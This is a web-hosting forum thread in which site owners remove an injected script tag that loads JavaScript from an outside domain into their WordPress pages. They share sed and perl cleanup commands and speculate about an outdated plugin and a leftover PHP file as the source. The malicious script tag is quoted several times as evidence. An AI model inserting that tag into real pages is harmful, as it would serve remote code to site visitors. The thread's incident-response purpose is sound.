SSH Command to do mass search and replace
Hi everyone, new here :)
Thanks to the kind works of a hacker, I have hundreds of files I need to remove the following from:
<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>
Is there a quick and easy way to do this through SSH?
Any help much appreciated! |
Let me get this straight: that command is in a number of different files, or is in one file a number of times?
If it is a number of files, then sadly they each need to be touched. If it is in one file a bunch of times, then any editor, txt or otherwise, should be able to handle find/replace options for you. |
Quote:
Code:
sed -i.bak '/<whatever>/d' *
Code:
for file in $(ls <file pattern>)
|
Hi
Many thanks for help. For reference, after many hours puzzling over it, this worked fine:
Code:
find . -type f | xargs perl -pi -e 's/<script language=\"JavaScript" src=\"http:\/\/abtt.tv\/modules\/mod_servises\/ua.js\" type=\"text\/javascript\"><\/script>//g'
I found the original source of the infection, which was an outdated WP plugin. That had allowed uploading of a file which scanned all other files, and wherever it found a </head> tag, it inserted that line of JS before it.
Thanks |
You need the additional protection that RH puts on the apache web server... (SELinux mandatory access controls).
With it, you can label static files as read only, even to the apache server that may own the files... |
outdated WP plugin
Hi ryedaleblue,
Yesterday I found exactly the same JavaScript code that infected my sites. My server hosts some Joomla installations and only one of WP. Can you please tell me what exactly was the outdated WP plugin that compromised your site? It seems this malicious URL is quite new; I can't find much info on it on the internet, I found just your post. Thank you in advance |
Hi Rizlo
Unfortunately, I've not been able to pinpoint it exactly. The infection occurred in a domain that has 15 WordPress subdomains for mini sites. The infection then spread through all sites, looking for all </head> tags and inserting that line. I downloaded all the files and my antivirus picked up on a couple of hack files that had been uploaded, but they weren't in a specific plugin folder. I've separated all the subdomains off into their own accounts on the server now to keep it isolated, and updated all plugins on all of them. If you run that code I've put above by using SSH and navigating to the root folder for your site, that should clear it out. You may get some warning messages about it not being able to open certain files, but it seems to clear through all text files OK. Hope this helps |
Hey guys, I have the exact same problem: it infected all WP installations on my server by adding that same tag to my <head> before the closing tag. It seems to have written it about four times to each file now. Maybe we can get together and compare plugins to pinpoint which one it is or something to find an official solution? As the previous gentleman stated, it is a fairly new exploit and there are no fixes that I've seen besides this one. Do I just log in through my main domain's cPanel, then go to SSH and paste this command?
Thanks in advance! |
Yep
I just navigated to public_html then ran that. It worked fine for me, but you may want to take a backup first! It seems to be spreading, so I'd certainly be interested to find out what is getting exploited. Thanks |
When my hosting company did a security audit on my hosting account, they said there was only one thing found malicious, in a folder called toolbox... I've since deleted the folder, which was a WP theme... but don't think that was the issue as it still seems to exist. I'm going to list a few current plugins that were installed by myself and a co-worker recently (so maybe you guys can compare to your list of suspected plugins) and we can hunt the sucker down.
Only other ways I can think of hunting the issue down, is doxing the domain the file is hosted on (the .js) and comparing the information found to Wordpress plugin authors. Wish I knew a way of monitoring which files are writing code to others, that would solve the problem almost immediately, lol. |
I run ConfigScanner's exploit scan service on my server, which is usually very quick at detecting hacks and quarantining them as soon as they are loaded into memory, but it missed this one, probably because it's so new and maybe also because it doesn't seem to do anything other than insert that line (as far as I've seen).
Yes I had the toolbox folder as well |
Odd, I deleted the toolbox folder, but it appears one file won't delete. Hrm... any ideas on your end if this is the folder causing the issue? The file is wp-status.php. It won't let me delete, edit or even view the file... tried chmodding it and everything... not sure what to do. Wonder if this is the cause of the issue?
|
Quote:
For that file, you might check to see if it is marked "immutable". If it is, you need to replace the entire system as the only way that could have been set is by root. And if it isn't RH based with SELinux enabled, you do have a problem. The RH based SELinux security models compartmentalize apache such that penetrations are confined to just files apache can write/update, with no access to system files or configuration files. |
That file that wouldn't let me remove it, I finally got my host to edit permissions on it so I was able to view/remove it. This is what the file code contained; not sure if a PHP guru can decode it to see if this is actually the cause of the issue that's writing the script tag to each file containing the head? If not, then the toolbox folder can't be the cause, because that's the only file that remains in the directory now.
PHP Code: Code:
<?php |
After going through it I'm pretty confident in saying that this is the cause of the issue, and once it's removed and the shell command is run it should be fine.
|